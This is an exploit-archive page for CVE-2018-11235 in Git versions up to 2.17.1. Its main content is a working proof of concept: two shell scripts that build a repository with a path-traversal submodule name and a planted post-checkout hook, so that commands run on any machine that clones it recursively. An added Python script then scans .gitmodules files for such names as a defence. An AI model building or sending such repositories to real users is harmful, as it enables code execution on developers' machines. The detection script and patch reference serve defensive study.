Git Remote Code Execution

01 Jun 2018 | Reported by Jameel Nabbo | Type: packetstorm | Source: packetstormsecurity.com

Git Remote Code Execution, CVE-2018-11235, <=2.17.1, Kali Linu

Code
`# Exploit Title: Git (code execution)  
# Date: 2018-05-29  
# Exploit Author: JameelNabbo  
# Website: jameelnabbo.com  
# Vendor Homepage: https://github.com/git/git  
# CVE: CVE-2018-11235  
# Version: <=2.17.1  
# Tested on Kali Linux  
  
  
PoC:  
  
Create two files:  
pwned.sh: the file that will contain the commands to be executed  
commit.sh: the file that contains a normal build with a few calls to our pwned.sh file  
  
Add the following to pwned.sh:  
#!/bin/sh  
cat << EOF  
  
#here we can put our lovely commands  
Exploited! : $(ifconfig)  
  
EOF  
  
#--------  
  
Add the following to the commit.sh file:  
#!/bin/sh  
  
set -e  
  
repo_dir="$PWD/repo"  
#change it to any other Repo  
repo_submodule='https://github.com/JameelNabbo/SmartWorm'  
  
git init "$repo_dir"  
cd "$repo_dir"  
git submodule add "$repo_submodule" pwned  
mkdir modules  
cp -r .git/modules/pwned modules  
cp ../pwned.sh modules/pwned/hooks/post-checkout  
git config -f .gitmodules submodule.pwned.update checkout  
git config -f .gitmodules --rename-section submodule.pwned submodule.../../modules/pwned  
git add modules  
git submodule add "$repo_submodule"  
git add SmartWorm  
git commit -am pwned  
echo "All done, now \`git clone --recurse-submodules \"$repo_dir\" dest_dir\`"  
  
  
Solution:  
https://www.edwardthomson.com/blog/upgrading_git_for_cve2018_11235.html  
  
  
`
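
For reviewing a repository before cloning it with `--recurse-submodules`, the following added example (not part of the original advisory or of Git) scans `.gitmodules` text for the pattern the PoC relies on: a submodule name that is empty or contains `..` as a path component, such as the renamed section `../../modules/pwned` above. The function names and the sample file are assumptions constructed for illustration.

```python
import re

# Matches a section header such as: [submodule "name"]
# The quoted subsection name may contain \" and \\ escapes.
_HEADER = re.compile(r'^\s*\[\s*submodule\s+"((?:[^"\\]|\\.)*)"\s*\]', re.IGNORECASE)


def submodule_names(gitmodules_text):
    """Yield (line_number, name) for every [submodule "..."] header."""
    for lineno, line in enumerate(gitmodules_text.splitlines(), 1):
        m = _HEADER.match(line)
        if m:
            # Undo the backslash escapes allowed inside a quoted subsection name.
            yield lineno, re.sub(r'\\(.)', r'\1', m.group(1))


def is_suspicious(name):
    """True for an empty name or one with '..' as a path component."""
    if not name:
        return True
    # Treat both '/' and '\' as separators so the rule is platform independent.
    return ".." in re.split(r'[/\\]', name)


def audit(gitmodules_text):
    """Return [(line_number, name)] for names that could escape .git/modules/."""
    return [(n, name) for n, name in submodule_names(gitmodules_text)
            if is_suspicious(name)]


# Constructed sample: one ordinary entry and one shaped like the renamed
# section in the PoC (submodule name "../../modules/pwned").
SAMPLE = '''\
[submodule "SmartWorm"]
	path = SmartWorm
	url = https://github.com/JameelNabbo/SmartWorm
[submodule "../../modules/pwned"]
	path = pwned
	url = https://github.com/JameelNabbo/SmartWorm
	update = checkout
'''

if __name__ == "__main__":
    for lineno, name in audit(SAMPLE):
        print(f".gitmodules:{lineno}: suspicious submodule name {name!r}")
```

A hit from this check is a reason to inspect the repository by hand and to confirm the local Git client has been upgraded as described in the linked solution.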
